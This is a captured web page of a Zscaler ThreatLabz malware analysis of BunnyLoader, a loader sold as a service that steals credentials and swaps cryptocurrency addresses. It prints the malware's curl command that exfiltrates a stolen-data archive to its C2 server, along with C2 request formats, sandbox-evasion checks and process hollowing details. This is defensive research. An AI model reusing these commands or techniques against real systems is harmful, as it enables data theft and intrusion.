www.zscaler.com Open in urlscan Pro
2606:4700::6812:1c4a  Public Scan

Submitted URL: http://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
Effective URL: https://www.zscaler.com/blogs/security-research/bunnyloader-newest-malware-service
Submission: On October 05 via api from DE — Scanned from DE

Form analysis 3 forms found in the DOM

<form class="topSearch_searchInputWrapper__n8dSG" __bizdiag="107944136" __biza="W___"><input type="text" name="query" class="topSearch_searchInput__E0Bk3" placeholder="What are you looking for?" aria-label="What are you looking for?"
    aria-hidden="true" tabindex="-1" value=""></form>

<form class="marketoForm_root__Wkgni marketoForm_variant_cta_module__IwKzs" id="mktoForm_7971" style="opacity:0" __bizdiag="196539198" __biza="W___"></form>

<form class="marketoForm_root__Wkgni marketoForm_variant_footer__jwLCq footer-subscription" id="mktoForm_1944" style="opacity:0" __bizdiag="196360362" __biza="W___"></form>

Text Content

Press Alt+1 for screen-reader mode, Alt+0 to cancelAccessibility Screen-Reader
Guide, Feedback, and Issue Reporting
This site uses JavaScript to provide a number of functions, to use this site
please enable JavaScript in your browser.
OpenSearch
CXO REvolutionariesCareersPartnersSupport
ShowContact UsOptions
Get in touch1-408-533-0288Chat with us
ShowSign InOptions
admin.zscaler.netadmin.zscalerone.netadmin.zscalertwo.netadmin.zscalerthree.netadmin.zscalerbeta.netadmin.zscloud.netZscaler
Private Access

Home
The Zscaler ExperienceProducts & SolutionsPlatformResourcesCompany
Request a demoopen search
open navigation
The Zscaler Experience

Zscaler: A Leader in the 2023 Gartner® Magic Quadrant™ for Security Service Edge
(SSE)

Get the full report

Your world, secured

Experience the transformative power of zero trust.



The Zscaler Difference

The Zscaler Difference
Experience the World’s Largest Security Cloud
Customer Success Stories
Analyst Recognition
Machine Learning and AI at Zscaler
Reduce Your Carbon Footprint

Zero Trust Fundamentals

Zero Trust Fundamentals
What is Zero Trust?
What Is Security Service Edge (SSE)?
What Is Secure Access Service Edge (SASE)?
What Is Zero Trust Network Access (ZTNA)?
What Is Secure Web Gateway (SWG)?
What Is Cloud Access Security Broker (CASB)?
What Is Cloud Native Application Protection Platform (CNAPP)?
Zero Trust Resources
Products & Solutions
Secure Your Users

Provide users with seamless, secure, reliable access to applications and data.


Secure Your Workloads

Build and run secure cloud apps, enable zero trust cloud connectivity, and
protect workloads from data center to cloud.


Secure Your IoT and OT

Provide zero trust connectivity for IoT and OT devices and secure remote access
to OT systems.




Products

Products

Transform your organization with 100% cloud native services

Secure Internet Access (ZIA)
Secure Private Access (ZPA)
Data Protection (CASB/DLP)
Digital Experience (ZDX)
Posture Control
Partner IntegrationsIndustry and Market Solutions

Solution Areas

Solution Areas

Propel your business with zero trust solutions that secure and connect your
resources

Stop Cyberattacks
Protect Data
Zero Trust App Access
VPN Alternative
Accelerate M&A Integration
Optimize Digital Experiences
Zero Trust Branch Connectivity
Build and Run Secure Cloud Apps
Zero Trust Cloud Connectivity
Zero Trust for IoT/OT
Zero Trust for Private 5G
Find a product or solution
Platform
Zero Trust Exchange Platform

Learn how Zscaler delivers zero trust with a cloud native platform that is the
world’s largest security cloud

Zero Trust Exchange PlatformTitle Link


Transform with Zero Trust Architecture

Transform with Zero Trust Architecture

Propel your transformation journey

Secure Digital Transformation
Network Transformation
Application Transformation
Security Transformation

Secure Your Business Goals

Secure Your Business Goals

Achieve your business and IT initiatives

Accelerate M&A and Divestitures
Recession-Proof Your Enterprise
Secure Your Hybrid Workforce
Download Zscaler Client Connectors
Resources
Learn, connect, and get support.

Explore tools and resources to accelerate your transformation and secure your
world

Learn, connect, and get support.Title Link

Amplifying the voices of real-world digital and zero trust pioneers

Visit now


Resource Center

Resource Center

Stay up to date on best practices

Resource Library
Blog
Customer Success Stories
Webinars & Demos
Zpedia

Events & Trainings

Events & Trainings

Find programs, certifications, and events

Upcoming Events
Zenith Live
Zscaler Academy
Interactive Zscaler Whiteboard Workshop

Security Research & Services

Security Research & Services

Get research and insights at your fingertips

ThreatLabz Analytics

Tools

Tools

Tools designed for you

Security Preview
Security and Risk Assessment
Security Advisory Updates
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator

Community & Support

Community & Support

Connect and find support

Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Download Zscaler Client Connector

Industry & Market Solutions

Industry & Market Solutions

See solutions for your industry and country

Public Sector
Healthcare
See all

Resource Center

Resource Center

Stay up to date on best practices

Resource Library
Blog
Customer Success Stories
Webinars & Demos
Zpedia

Events & Trainings

Events & Trainings

Find programs, certifications, and events

Upcoming Events
Zenith Live
Zscaler Academy
Interactive Zscaler Whiteboard Workshop

Security Research & Services

Security Research & Services

Get research and insights at your fingertips

ThreatLabz Analytics

Tools

Tools

Tools designed for you

Security Preview
Security and Risk Assessment
Security Advisory Updates
Disclose a Vulnerability
Executive Insights App
Ransomware Protection ROI Calculator

Community & Support

Community & Support

Connect and find support

Customer Success Center
Zenith Community
CXO REvolutionaries
Zscaler Help Portal
Download Zscaler Client Connector

Industry & Market Solutions

Industry & Market Solutions

See solutions for your industry and country

Public Sector
Healthcare
See all
Company
About Zscaler

Discover how it began and where it’s going

Partners

Meet our partners and explore system integrators and technology alliances

News & Announcements

Stay up to date with the latest news

Leadership Team

Meet our management team

Partner Integrations

Explore best-in-class partner integrations to help you accelerate digital
transformation

Investor Relations

See news, stock information, and quarterly reports

Environmental, Social & Governance

Learn about our ESG approach

Careers

Join our mission

Press Center

Find everything you need to cover Zscaler

Compliance

Understand our adherence to rigorous standards

Zenith Ventures

Understand our adherence to rigorous standards


ZSCALER BLOG

Get the latest Zscaler blog updates in your inbox

Subscribe
Security Research


BUNNYLOADER, THE NEWEST MALWARE-AS-A-SERVICE

NIRAJ SHIVTARKAR, SATYAM SINGH
September 29, 2023 - 11 min read



Threatlabz Research


Contents

 1. Introduction
 2. Key Takeaways
 3. Basics
 4. C2 Panel
 5. Technical Analysis
 6. Conclusion
 7. Zscaler Sandbox Coverage
 8. Indicators of Compromise (IOCs)
 9. More blogs

Copy URL
Copy URL



INTRODUCTION

In early September, Zscaler ThreatLabz discovered a new Malware-as-a-Service
(MaaS) threat called “BunnyLoader” being sold on various forums. BunnyLoader
provides various functionalities such as downloading and executing a
second-stage payload, stealing browser credentials and system information, and
much more. BunnyLoader employs a keylogger to log keystrokes as and a clipper to
monitor the victim’s clipboard and replace cryptocurrency wallet addresses with
actor-controlled cryptocurrency wallet addresses. Once the information is
obtained, BunnyLoader encapsulates the data into a ZIP archive and proceeds to
transmit the pilfered data to a command-and-control (C2) server. In this blog,
we’ll describe how BunnyLoader works and its technical components.


KEY TAKEAWAYS

 * ThreatLabz identified a new malware loader written in C/C++ named
   “BunnyLoader” sold on various forums for $250.
 * BunnyLoader is under rapid development with multiple feature updates and bug
   fixes.
 * BunnyLoader employs various anti-sandbox techniques during its attack
   sequence.
 * BunnyLoader downloads and executes a second-stage payload, logs keys, steals
   sensitive information and cryptocurrency, and executes remote commands.


BASICS

In early September, ThreatLabz came across a new malware loader named
BunnyLoader. The malware was being sold on various forums by a user named
“PLAYER_BUNNY”/”PLAYER_BL”, who seems to be one of the developers of the loader
as shown in the figure below.

Figure 1: BunnyLoader advertisement from criminal forums.

Based on the advertisement, BunnyLoader has the following features:

 * Written in C/C++
 * Fileless loader - download & execute further malware stages in memory
 * Consists of stealer and clipper capabilities
 * Remote command execution
 * Incorporates anti-analysis techniques
 * Provides a web panel showcasing stealer logs, total clients, active tasks and
   much more
 * Price - $250 (Lifetime)

Since BunnyLoader’s v1.0 initial release on September 4, 2023, the malware has
been under rapid development, with many feature updates and bug fixes being
released between the 4th of September and the time this blog was written
(September 29 2023). In the table below, you can see that BunnyLoader’s updates
address bug issues, changes to the C2 panel, and even new pricing tiers.

BunnyLoader release historyVersionDate of ReleaseUpdatesBunnyLoader v1.0Sept 4,
2023N/ABunnyLoader v1.1Sept 5, 2023
 * Client bug
 * Compress stealer logs before uploading
 * Command added for reverse shell: pwd

BunnyLoader v1.2Sept 6, 2023
 * Added browser history recovery to stealer
 * Added NGRok auth-token recovery to stealer
 * Added Chromium browser paths (Chromium, Google Chrome x86, MapleStudio,
   Iridium, Maxthon3)

BunnyLoader v1.3Sept 9, 2023
 * Added credit card recovery to stealer function
 * Added support for 16 different credit card types
 * Fix C2 bugs

BunnyLoader v1.4Sept 10, 2023Implemented AV evasionBunnyLoader v1.5Sept 11, 2023
 * Added VPN recovery to stealer (ProtonVPN & OpenVPN)
 * Fix fileless loader bugs
 * Optimization in loading logs

BunnyLoader v1.6Sept 12, 2023
 * Added downloads history viewer to stealer
 * Added anti-sandbox techniques

BunnyLoader v1.7Sept 15, 2023Implemented additional AV evasionBunnyLoader
v1.8Sept 15, 2023
 * Implemented keylogger functionality
 * Bug fixes in execution of tasks
 * Fix C2 bugs

BunnyLoader v1.9Sept 17, 2023
 * Added game recovery to stealer (Uplay & Minecraft)
 * Added 5 Chromium browser paths
 * Added 1 desktop wallet recovery to stealer

BunnyLoader v2.0Sept 27, 2023
 * C2 GUI Changes
 * Fix critical vulnerabilities - SQL injection in the C2 Panel which would give
   access to the database and XSS vulnerabilities fixed
 * Major bugs fixed
 * C2 will detect and block exploit attempts
 * Optimization in stealer
 * Optimization in fileless loader

Selling private stub:

 * Advanced and proactive anti-analysis
 * Inject payload into memory (support x86/x64)
 * AV evasion
 * Persistence

New prices:

 * Payload - $250
 * Payload + Stub - $350

 


C2 PANEL

The BunnyLoader C2 panel showcases a list of various tasks including:

 * downloading and executing additional malware 
 * keylogging
 * stealing credentials 
 * manipulating a victim’s clipboard to steal cryptocurrency
 * running remote commands on the infected machine 

The parameters consisting of the download URL and the cryptocurrency wallet
addresses are added in the panel as shown below.

Figure 2: A screenshot of the BunnyLoader C2 panel configuration.

The BunnyLoader panel also provides:

 * statistics for infections 
 * the total connected/disconnected clients
 * active tasks
 * stealer logs and also 

The information can be cleared from the panel.

Figure 3: A screenshot of the statistics and options to clear data in the
BunnyLoader C2 panel.

In addition, the infected machines can be controlled remotely through the C2
panel, as shown in the screenshot below.

Figure 4: A screenshot of the BunnyLoader C2 panel showing infected systems.


TECHNICAL ANALYSIS

In the following section, we will analyze a malware sample of BunnyLoader. Upon
execution of BunnyLoader, the loader performs the following actions:

 1. Creates a new registry value named “Spyware_Blocker” in the Run registry key
    (HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run) where the
    value is the path to the BunnyLoader binary. This registry value allows
    BunnyLoader to maintain persistence on the machine.
 2. Hides the window using ShowWindow() with nCmdShow as SW_HIDE
 3. Creates a mutex name “BunnyLoader_MUTEXCONTROL” via CreateMutexW()
 4. Performs the following anti-VM techniques:
    * Checks for the following modules:
      * SxIn.dll - 360 Total Security
      * cmdvrt32.dll / cmdvrt64.dll - Comodo Antivirus
      * wine_get_unix_file_name - Detects Wine 
      * SbieDll.dll - Sandboxie
    * Checks for a VM using “ROOT\CIMV2” queries:
      * SELECT * FROM Win32_VideoController
      * Win32_Processor
      * Win32_NetworkAdapter 
      * Win32_BIOS 
      * SELECT * FROM Win32_ComputerSystem
    * Checks for a Docker container via “/proc/1/cgroup” - if the container
      exists, BunnyLoader does not perform further malicious actions.
    * Checks for the following blacklisted sandbox usernames:
      * ANYRUN
      * Sandbox
      * Test
      * John Doe
      * Abby
      * Timmy
      * Maltest
      * malware
      * Emily
      * Timmy
      * Paul Jones
      * CurrentUser
      * IT-ADMIN
      * Walker
      * Lisa
      * WDAGUtilityAccount
      * Virus
      * fred

If a sandbox is identified, BunnyLoader throws the following error message: 

“The version of this file is not compatible with the current version of Windows
you are running. Check your computer's system information to see whether you
need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact
the software publisher.”

Otherwise, BunnyLoader performs an HTTP registration request to a C2 server as
shown below:

--------------------------------------------------------------------------------

GET /Bunny/Add.php?country=<country>&ip=<ip>&host=<host>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: BunnyLoader
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 11
Content-Type: text/html; charset=UTF-8

Connected

--------------------------------------------------------------------------------

The registration request sent to the C2 server (shown above) contains the
following information:

Information in C2 server requestValueDescriptioncountryGathers the country where
the infected system is connecting from via “http[:]//ip-api.com/csv” where the
user agent is “BunnyRequester”ipGathers the victim IP from
“http[:]//api.ipify.org” where the user agent is “BunnyRequester”hostGathers the
hostname via GetComputerNameAverThe version of BunnyLoader (e.g., 2.0)system

Fetches the operating system via “systeminfo | findstr /B /C:"OS Name”

privsFetches the privileges of the current user via OpenProcessToken. Sends
“Admin” if the user is an administrator or sends the string “user”.avGathers the
anti-virus on the infected machine via wmic /namespace:\\root\SecurityCenter2
path AntiVirusProduct get displayName /value

The user agent for the request is set to “BunnyLoader”. If the response from the
C2 is “Connected”, BunnyLoader performs the core malicious actions.

Task Execution

After registration, BunnyLoader sends a task request to the C2 server
“http[:]//37[.]139[.]129[.]145/Bunny/TaskHandler.php?BotID=<bot_id>” with the
user agent as “BunnyTasks”. As shown below, the response to the task request
consists of the “ID”, “Name” and “Params”.

--------------------------------------------------------------------------------

GET /Bunny/TaskHandler.php?BotID=<Bot_ID> HTTP/1.1
User-Agent: BunnyTasks
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 102
Content-Type: text/html; charset=UTF-8

ID: 5 Name: Run Stealer Params: ID: 3 Name: Bitcoin Params: bc1<bitcoin_address>5k

--------------------------------------------------------------------------------

Here the "Name" is the module (functionality) to be executed and the “params”
are the parameters passed to the module. Based on the module name received in
the task response, BunnyLoader further performs its actions.

BunnyLoader consists of the following tasks:

 * Trojan Downloader
   * Download and Execute (Fileless Execution)
   * Download and Execute (Disk Execution)
 * Intruder
   * Run Keylogger
   * Run Stealer
 * Clipper
   * Bitcoin
   * Monero
   * Ethereum
   * Litecoin
   * Dogecoin
   * ZCash
   * Tether
 * Remote Command Execution

Run Keylogger Task

BunnyLoader implements a basic keylogger using GetAsyncKeyState() for logging
key strokes. The output of the keylogger is stored in the file
“C:\Users\<username>\AppData\Local\Keystrokes.txt”.

Run Stealer Task

BunnyStealer is designed to steal information related to web browsers,
cryptocurrency wallets, VPNs and much more. Eventually the stolen information is
stored in a folder named “BunnyLogs” in the Appdata\Local Directory, which is
compressed as a ZIP archive, and exfiltrated to the C2 server. The following are
the web browsers targeted by BunnyLoader:

 * 7Star\7Star\User Data
 * Yandex\YandexBrowser\User Data
 * CentBrowser\User Data
 * Comodo\User Data
 * Chedot\User Data
 * 360Browser\Browser\User Data
 * Vivaldi\User Data
 * Maxthon3\User Data
 * Kometa\User Data
 * K-Melon\User Data
 * Elements Browser\User Data
 * Google\Chrome\User Data\\Sputnik\Sputnik\User Data
 * Epic Privacy Browser\User Data
 * Nichrome\User Data
 * uCozMedia\Uran\User Data
 * CocCoc\Browser\User Data
 * Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewer
 * Uran\User Data
 * CatalinaGroup\Citrio\User Data
 * Chromodo\User Data
 * Coowon\Coowon\User Data
 * Mail.Ru\Atom\User Data
 * liebao\User Data
 * Microsoft\Edge\User Data
 * QIP Surf\User Data
 * BraveSoftware\Brave-Browser\User Data
 * Orbitum\User Data
 * Chromium\User Data
 * Comodo\Dragon\User Data
 * Google(x86)\Chrome\User Data
 * Amigo\User\User Data
 * MapleStudio\ChromePlus\User Data
 * Torch\User Data
 * Iridium\User Data

BunnyLoader steals following information from these web browsers:

 * AutoFill data
 * Credit cards
 * Downloads
 * History
 * Passwords

The malware targets the following cryptocurrency wallets:

 * Armory
 * Exodus
 * AutomaticWallet
 * Bytecoin
 * Ethereum
 * Coinomi
 * Jaxx
 * Electrum
 * Guarda

BunnyLoader steals credentials from the following VPN clients:

 * ProtonVPN 
 * OpenVPN

Credentials are also stolen from following messaging applications:

 * Skype
 * Tox
 * Signal
 * Element
 * ICQ

Examples of the stolen information are shown in the figure below. The logs
consist of an information.txt file which contains system information along with
the information related to the location of the infected machine. Each folder
contains the corresponding data stolen from the system. For example, the Browser
folder contains the web browser history and downloaded file information.

Figure 5: A screenshot of the information exfiltrated by BunnyLoader.

The stolen data is archived using the Powershell cmdlet:
System.IO.Compression.ZipFile with the filename “BunnyLogs_<hostname>.zip”. The
ZIP archive is exfiltrated to the C2 server via the following CURL command:

--------------------------------------------------------------------------------

cmd.exe /c curl -F
"file=@C:\Users\user\AppData\Local\BunnyLogs_468325.zip"
http[:]//37[.]139[.]129[.]145/Bunny/Uploader.php

--------------------------------------------------------------------------------

BunnyLoader also performs a stealer registration request containing statistics
related to the stolen information and the link to the exfiltrated logs with the
user agent: “BunnyStealer”, as shown below:

--------------------------------------------------------------------------------

GET /Bunny/StealerRegistration.php?country=<country>&ip=<ip>&system=Micro
soft+Windows+10+Pro%0A&chromium=18&crypto=1&messages=0&vpn=0&keys=0&lin
k=http%3A%2F%2F37[.]139[.]129[.]145%2FBunny%2FStealerLogs%2FBunnyLogs_
468325.zip&date=Mon+Sep+25+21%3A47%3A41+2023%0A&games=0 HTTP/1.1
User-Agent: BunnyStealer
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

--------------------------------------------------------------------------------

Clipper Task

The BunnyLoader clipper module checks a victim's clipboard for content matching
cryptocurrency addresses and replaces them with a wallet address controlled by
the threat actor.

In this case, the targeted cryptocurrencies are: 

 * Bitcoin
 * Monero
 * Ethereum
 * Litecoin
 * Dogecoin
 * ZCash
 * Tether

The clipper receives the cryptocurrency wallet addresses to replace from the C2
server.

Download and Execute Task

BunnyLoader performs two types of download and execute functions. 

 * The first type is downloading a file from a URL provided by the C2, which is
   written to disk in the AppData\Local directory and further executed. 
 * The second type uses fileless execution, where BunnyLoader creates a
   “notepad.exe” process in a suspended state and then downloads the payload
   from the received URL with the user agent “BunnyLoader_Dropper”. The
   downloaded binary is stored in a memory buffer and BunnyLoader performs
   Process Hollowing to inject the downloaded payload into the “notepad.exe”
   process as shown in the figure below.

Figure 6: A screenshot of BunnyLoader fileless download and executing code.

After the tasks are completed, BunnyLoader sends the following task completion
request with the user agent as “TaskCompleted” and the CommandID as the Task ID.
An example task completion request is shown below:

--------------------------------------------------------------------------------

http://37[.]139[.]129[.]145/Bunny/TaskHandler.php?CommandID=5&BotID=272148461

--------------------------------------------------------------------------------

Remote Command Execution Task

BunnyLoader performs remote command execution from the C2 panel. BunnyLoader
receives the commands to be executed on the infected machine via an “echoer”
request to C2 server (e.g., http[:]//37[.]139[.]129[.]145/Bunny/Echoer.php) with
the user agent set to “BunnyTasks” as shown in the figure below. BunnyLoader
parses the response and checks for the following commands: “help”, “cd”, “pwd”
and then executes the command using _popen and the command output is been sent
across to the C2 server as the “&value=” parameter in a result command request:
(e.g., http[:]//37[.]139[.]129[.]145/Bunny/ResultCMD.php) with the user agent:
“BunnyShell”.

Figure 7: A screenshot of BunnyLoader remote command execution.

BunnyLoader also performs a heartbeat request in order to inform the C2 that the
infected system is online as shown below. The user agent for the heartbeat is
“HeartBeat_Sender”.

--------------------------------------------------------------------------------

GET /Bunny/Heartbeat.php?country=<country>&ip=<ip>&host=<hostname>&ver=2.0&system=Microsoft+Windows+10+Pro%0A&privs=Admin&av=Windows+Defender HTTP/1.1
User-Agent: HeartBeat_Sender
Host: 37[.]139[.]129[.]145
Cache-Control: no-cache

HTTP/1.1 200 OK
Date: Mon, 25 Sep 2023 21:11:41 GMT
Server: Apache/2.4.56 (Win64) OpenSSL/1.1.1t PHP/8.2.4
X-Powered-By: PHP/8.2.4
Content-Length: 13
Content-Type: text/html; charset=UTF-8

Client online


--------------------------------------------------------------------------------

 


CONCLUSION

BunnyLoader is a new MaaS threat that is continuously evolving their tactics and
adding new features to carry out successful campaigns against their targets. The
Zscaler ThreatLabz team will continue to monitor these attacks to help keep our
customers safe.

Figure 10: Zscaler Sandbox detecting BunnyLoader.

Win32.Downloader.BunnyLoader


INDICATORS OF COMPROMISE (IOCS)

C2 Server - 37[.]139[.]129[.]145/Bunny/

BunnyLoader samples:

 * dbf727e1effc3631ae634d95a0d88bf3
 * bbf53c2f20ac95a3bc18ea7575f2344b
 * 59ac3eacd67228850d5478fd3f18df78






EXPLORE MORE ZSCALER BLOGS

Agniane Stealer: Dark Web’s Crypto Threat
Read Post
Mystic Stealer
Read Post
Technical Analysis of Xloader’s Code Obfuscation in Version 4.3
Read Post



GET THE LATEST ZSCALER BLOG UPDATES IN YOUR INBOX



By submitting the form, you are agreeing to our privacy policy.





THE ZSCALER EXPERIENCE

Learn about:

Your world, secured.Zero TrustSecurity Service Edge (SSE)Secure Access Service
Edge (SASE)Zero Trust Network Access (ZTNA)Secure Web Gateway (SWG)Cloud Access
Security Broker (CASB)Cloud Native Application Protection Platform (CNAPP)
PRODUCTS & SOLUTIONS
Secure Your Users

Secure Your Workloads

Secure Your IoT and OT

Secure Internet Access (ZIA)

Secure Private Access (ZPA)

Digital Experience (ZDX)

Posture Control

Industry & Market Solutions

Partner Integrations

Zscaler Client Connector

PLATFORM
Zero Trust Exchange Platform

Secure Digital Transformation

Application Transformation

Network Transformation

Security Transformation

RESOURCES
Resource Library

Security Preview

Security & Risk Assessment

Internet Threat Exposure Analysis

ThreatLabz Analytics & Insights

Upcoming Events

Blog

Zscaler Academy

CXO Revolutionaries

Zpedia

Ransomware Protection ROI Calculator

POPULAR LINKS
Pricing & Plans

About Zscaler

Leadership Team

Career Opportunities

Find or Become a Partner

Customer Success Center

Investor Relations

Press Center

News & Announcements

ESG

Compliance

Contact Zscaler

Home
English
EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - España

Zscaler is universally recognized as the leader in zero trust. Leveraging the
largest security cloud on the planet, Zscaler anticipates, secures, and
simplifies the experience of doing business for the world's most established
companies.

English
EnglishFrançaisDeutschItaliano日本Castellano - MexicoCastellano - España

Visit us on FacebookLinkedinFollow us on TwitterSubscribe our Youtube Channel
SitemapPrivacyLegalSecurity
© 2023 Zscaler, Inc.

All rights reserved. Zscaler™ and other trademarks listed at
zscaler.com/legal/trademarks are either (i) registered trademarks or service
marks or (ii) trademarks or service marks of Zscaler, Inc. in the United States
and/or other countries. Any other trademarks are the properties of their
respective owners.



Zscaler uses cookies to personalize content and ads, to provide social media
features and to analyze our traffic. We also share information about your use of
our site with our social media, advertising and analytics partners.Please review
our Cookies Policy for more information.

Cookies Settings Accept Cookies